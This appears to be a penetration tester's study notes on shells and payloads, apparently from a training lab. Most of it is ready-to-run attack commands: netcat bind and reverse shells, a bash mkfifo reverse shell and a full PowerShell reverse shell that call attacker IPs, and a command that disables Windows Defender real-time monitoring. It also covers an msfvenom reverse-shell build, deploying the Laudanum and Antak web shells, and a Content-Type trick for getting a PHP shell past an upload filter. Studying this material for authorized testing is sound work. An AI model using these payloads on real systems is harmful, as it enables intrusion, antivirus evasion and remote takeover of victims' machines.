Skip to content

Shells and Payloads

Shell Basics

Bind Shells

In many cases, we will be working to establish a shell on a system on a local or remote network. This means we will be looking to use the terminal emulator application on our local attack box to control the remote system through its shell. This is typically done using a Bind and/or Reverse shell.

Once connected to the target box with SSH, start a Netcat listener: 

nc -lvnp 7777
On the attack box, connect to target 
nc -nv 10.129.41.200 7777

The above shows that we can use Netcat to send text between the client and server, but this is not a bind shell because we cannot interact with the OS and file system. We are only able to pass text within the pipe setup by Netcat. On the server side, we need to specify the directory, shell, listener, work with some pipelines, and input & a output redirection to ensure a shell to the system gets served when the client attempts to connect. This code is considered our payload, and we delivered this payload manually. 

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f
Now we use netcat to connect to the server 
nc -nv 10.129.41.200 7777

Reverse Shells

With a reverse shell, the attack box will have a listener running, and the target will need to initiate the connection. We will often use this kind of shell as we come across vulnerable systems because it is likely that an admin will overlook outbound connections, giving us a better chance of going undetected. We can start a Netcat listener on our attack box 

sudo nc -lvnp 443
On Windows, we can use this one liner . Don't forget to change the IP address and port. 
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
However, this is usually blocked by AV software, so we can disable AV and try to connect again. 
Set-MpPreference -DisableRealtimeMonitoring $true

Payloads

A Netcat/Bash reverse shell one liner 

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f

A PowerShell one-liner 

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

With MSFvenom, we can use the command msfvenom -l payloads to list all the available payloads. Once you see a payload you like, build it with 

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf
Remember to have Netcat listener to catch the payload

Besides the vectors of web-drive-by, phishing emails, or dead drops, Windows hosts can provide us with several other avenues of payload delivery. The list below includes some helpful tools and protocols for use while attempting to drop a payload on a target: - Impacket: Impacket is a toolset built in Python that provides us a way to interact with network protocols directly. Some of the most exciting tools we care about in Impacket dead with psexec, smbclient, wmi, Kerberos and the ability to stand up an SMB server - Payload All The Things: is a great resource to find quick one liners to help transfer files across host expediently - SMG: SMB can provide an easy to exploit route to transfer files between hosts. - Remote execution via MSF - Other protocols: FTP, TFTP, HTTP/S

We can drop into a system shell to gain access to the target system as if we were logged in and open a CMD.exe console. By using then we can check if Python is installed on the system 

meterpreter > shell

which python
To get a TTY shell with Python 
python -c 'import pty; pty.spawn("/bin/sh")'

Web Shells

Laudanum

The Laudanum files can be found in the /usr/share/laudanum directory. For most of the files within Laudanum, you can copy them as-is and place them where you need them on the victim to run. For specific files such as the shells, you just edit the file first to insert your attacking IP address to ensure you can access the web shell or receive a callback in the instance. First copy a shell from the laudanum folder to a working folder and add your IP address to the allowedIps variable on line 59. 

cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspx
Then upload the file and go onto the webpage. Sometimes you need to add a "\\" to your paths

Antak

Antak is a web shell build in ASP .NET and uses PowerShell to interact with the host. The files can be found in the /usr/share/nishang/Antak-WebShell directory. Don't forget to add a username and password to the web shell, on line 14.

PHP Web Shell

Since PHP processes code and commands on the server-side, we can use pre-written payloads to gain a shell through the browser or initiate a reverse shell session with our attack box. However, this time rConfig will check the file type before sending it. So we can use Burp Suite to bypass the file restrictions. We do this by changing the Content-Type from application/x-php to image/gif.